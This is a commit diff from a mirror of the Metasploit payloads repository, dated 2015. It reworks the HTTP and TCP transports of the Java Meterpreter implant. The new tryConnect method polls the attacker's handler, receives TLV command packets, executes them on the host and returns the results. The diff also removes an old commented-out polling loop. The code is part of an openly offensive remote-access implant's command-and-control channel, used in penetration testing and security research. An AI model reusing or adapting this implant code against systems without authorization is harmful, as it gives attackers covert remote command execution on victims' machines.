github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-21 05:35:54 +01:00
Code Releases Activity

Reconnect vs connet handling for HTTP/S

Browse Source
This commit is contained in:
OJ 2015-06-24 21:57:08 +10:00
parent fbbff1e7b4
commit 85f2e12165
4 changed files with 42 additions and 90 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/HttpTransport.java
View File

@ -67,10 +67,42 @@ public class HttpTransport extends Transport {
} }
protected boolean tryConnect(Meterpreter met) throws IOException { protected boolean tryConnect(Meterpreter met) throws IOException {
// given that we don't have a persistent connection, we just assume System.out.println("msf : attempting to read packet on reconnect");
// that we "can" connect, and handle the failures when dealing with URLConnection conn = this.createConnection();
// the packet handling
return true; if (conn == null) {
return false;
}
OutputStream outputStream = conn.getOutputStream();
outputStream.write(RECV);
outputStream.close();
DataInputStream inputStream = new DataInputStream(conn.getInputStream());
try {
int len = inputStream.readInt();
int type = inputStream.readInt();
TLVPacket request = new TLVPacket(inputStream, len - 8);
inputStream.close();
// things are looking good, handle the packet and return true, as this
// is the situation that happens on initial connect (not reconnect)
TLVPacket response = request.createResponse();
int result = met.getCommandManager().executeCommand(met, request, response);
this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE);
return true;
}
catch (EOFException ex) {
// this can happens on reconnect
return true;
}
catch (Exception ex) {
}
// we get here, thins aren't good.
return false;
} }
public TLVPacket readPacket() throws IOException { public TLVPacket readPacket() throws IOException {
@ -131,7 +163,7 @@ public class HttpTransport extends Transport {
} }
} }
public boolean dispatch(Meterpreter met, CommandManager commandManager) { public boolean dispatch(Meterpreter met) {
System.out.println("msf : In the dispatch loop"); System.out.println("msf : In the dispatch loop");
long lastPacket = System.currentTimeMillis(); long lastPacket = System.currentTimeMillis();
long ecount = 0; long ecount = 0;
@ -150,7 +182,7 @@ public class HttpTransport extends Transport {
lastPacket = System.currentTimeMillis(); lastPacket = System.currentTimeMillis();
TLVPacket response = request.createResponse(); TLVPacket response = request.createResponse();
int result = commandManager.executeCommand(met, request, response); int result = met.getCommandManager().executeCommand(met, request, response);
this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE); this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE);

82
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
View File

@ -184,7 +184,7 @@ public class Meterpreter {
} }
System.out.println("msf : entering dispatch"); System.out.println("msf : entering dispatch");
boolean cleanExit = this.transports.current().dispatch(this, this.commandManager); boolean cleanExit = this.transports.current().dispatch(this);
System.out.println("msf : dispatch exited " + (cleanExit ? "cleanly" : "badly")); System.out.println("msf : dispatch exited " + (cleanExit ? "cleanly" : "badly"));
this.transports.current().disconnect(); this.transports.current().disconnect();
@ -207,86 +207,6 @@ public class Meterpreter {
return "com.metasploit.meterpreter.PayloadTrustManager"; return "com.metasploit.meterpreter.PayloadTrustManager";
} }
/**
* Poll from a given URL until a shutdown request is received.
*
* @param url
*/
//private void pollURL(URL url, int sessionExpirationTimeout, int sessionCommunicationTimeout) throws IOException {
// synchronized (this) {
// tlvQueue = new ArrayList();
// }
// int ecount = 0;
// long deadline = System.currentTimeMillis() + sessionExpirationTimeout * 1000L;
// long commDeadline = System.currentTimeMillis() + sessionCommunicationTimeout * 1000L;
// final byte[] RECV = "RECV".getBytes("ISO-8859-1");
// while (System.currentTimeMillis() < Math.min(commDeadline, deadline)) {
// byte[] outPacket = null;
// synchronized (this) {
// if (tlvQueue.size() > 0)
// outPacket = (byte[]) tlvQueue.remove(0);
// }
// TLVPacket request = null;
// try {
// URLConnection uc = url.openConnection();
// if (url.getProtocol().equals("https")) {
// // load the trust manager via reflection, to avoid loading
// // it when it is not needed (it requires Sun Java 1.4+)
// try {
// Class.forName(getPayloadTrustManager()).getMethod("useFor", new Class[]{URLConnection.class}).invoke(null, new Object[]{uc});
// } catch (Exception ex) {
// ex.printStackTrace(getErrorStream());
// }
// }
// uc.setDoOutput(true);
// OutputStream out = uc.getOutputStream();
// out.write(outPacket == null ? RECV : outPacket);
// out.close();
// DataInputStream in = new DataInputStream(uc.getInputStream());
// int len;
// try {
// len = in.readInt();
// } catch (EOFException ex) {
// len = -1;
// }
// if (len != -1) {
// int ptype = in.readInt();
// if (ptype != PACKET_TYPE_REQUEST)
// throw new RuntimeException("Invalid packet type: " + ptype);
// request = new TLVPacket(in, len - 8);
// }
// in.close();
// commDeadline = System.currentTimeMillis() + sessionCommunicationTimeout * 1000L;
// } catch (IOException ex) {
// ex.printStackTrace(getErrorStream());
// // URL not reachable
// if (outPacket != null) {
// synchronized (this) {
// tlvQueue.add(0, outPacket);
// }
// }
// }
// if (request != null) {
// ecount = 0;
// TLVPacket response = executeCommand(request);
// if (response == null)
// break;
// writeTLV(PACKET_TYPE_RESPONSE, response);
// } else if (outPacket == null) {
// int delay;
// if (ecount < 10) {
// delay = 10 * ecount;
// } else {
// delay = 100 * ecount;
// }
// sleep(Math.min(10000, delay));
// }
// }
// synchronized (this) {
// tlvQueue = new ArrayList();
// }
//}
/** /**
* Get the command manager, used to register or lookup commands. * Get the command manager, used to register or lookup commands.
*/ */

4
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TcpTransport.java
View File

@ -112,7 +112,7 @@ public class TcpTransport extends Transport {
} }
} }
public boolean dispatch(Meterpreter met, CommandManager commandManager) { public boolean dispatch(Meterpreter met) {
System.out.println("msf : In the dispatch loop"); System.out.println("msf : In the dispatch loop");
long lastPacket = System.currentTimeMillis(); long lastPacket = System.currentTimeMillis();
while (!met.hasSessionExpired() && while (!met.hasSessionExpired() &&
@ -131,7 +131,7 @@ public class TcpTransport extends Transport {
lastPacket = System.currentTimeMillis(); lastPacket = System.currentTimeMillis();
TLVPacket response = request.createResponse(); TLVPacket response = request.createResponse();
int result = commandManager.executeCommand(met, request, response); int result = met.getCommandManager().executeCommand(met, request, response);
this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE); this.writePacket(response, TLVPacket.PACKET_TYPE_RESPONSE);

2
java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Transport.java
View File

@ -18,7 +18,7 @@ public abstract class Transport {
public abstract int parseConfig(byte[] configuration, int offset); public abstract int parseConfig(byte[] configuration, int offset);
public abstract void bind(DataInputStream in, OutputStream rawOut); public abstract void bind(DataInputStream in, OutputStream rawOut);
public abstract void disconnect(); public abstract void disconnect();
public abstract boolean dispatch(Meterpreter met, CommandManager commandManager); public abstract boolean dispatch(Meterpreter met);
public abstract void writePacket(TLVPacket packet, int type) throws IOException; public abstract void writePacket(TLVPacket packet, int type) throws IOException;
public abstract TLVPacket readPacket() throws IOException; public abstract TLVPacket readPacket() throws IOException;